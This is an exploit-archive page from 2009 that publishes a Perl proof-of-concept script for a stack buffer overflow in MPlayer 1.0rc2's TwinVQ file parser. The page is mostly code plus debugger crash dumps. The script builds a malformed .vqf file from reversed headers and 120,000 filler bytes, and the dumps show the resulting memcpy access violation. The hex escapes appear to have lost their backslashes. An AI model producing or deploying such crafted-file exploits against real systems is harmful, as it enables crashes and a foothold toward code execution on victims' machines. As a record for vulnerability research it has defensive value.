[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
# Published : 2009-01-16
# Author : sCORPINo
# Previous Title : Novell Netware 6.5 (ICEbrowser) Remote System DoS Exploit
# Next Title : Cisco VLAN Trunking Protocol Denial of Service Exploit
#!/usr/bin/perl
# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
# PoC by Amirreza Aminsalehi "sCORPINo"
# (Proud To be an Abay)
# scorpino x40 gmail x2e com
# Snoop Security Researching Committee
# www.snoop-security.com
# Originaly this bug discovered by Tobias Klein
# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt
# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;)
# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers.
# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members
###########################################################################################
# You Can See Debug dumps here:
#
#(8ec.748): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32msvcrt.dll -
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#0:000> g
#(8ec.748): Access violation - code c0000005 (!!! second chance !!!)
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
###########################################################################################
my $file="amir.vqf";
open(my $FILE, ">$file") or die "Cannot open $file: $!";
$head = "x00x01xD4xC0"; #SIZE
$head2 = "x43x4fx4dx4d"; #COMM
$head3 ="x00x00x00x10x00x00x00x01x00x00x00x60x00x00x00x2c".
"x00x00x00x00x4ex41x4dx45x00x00x00x0bx47x69x6cx64".
"x65x64x20x43x61x67x65x41x55x54x48x00x00x00x11x42".
"x6cx61x63x6bx6dx6fx72x65x91x73x20x4ex69x67x68x74".
"x28x63x29x20x00x00x00x04x4ax75x72x61x41x4cx42x4d".
"x00x00x00x0dx53x65x63x72x65x74x20x56x6fx79x61x67".
"x65x54x52x43x4bx00x00x00x02x30x33x44x41x54x41x0c"; # other headers. Not in mood to separate every one ;)
print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p
close($FILE);
print "$file has been created n";
# www.Syue.com [2009-01-16]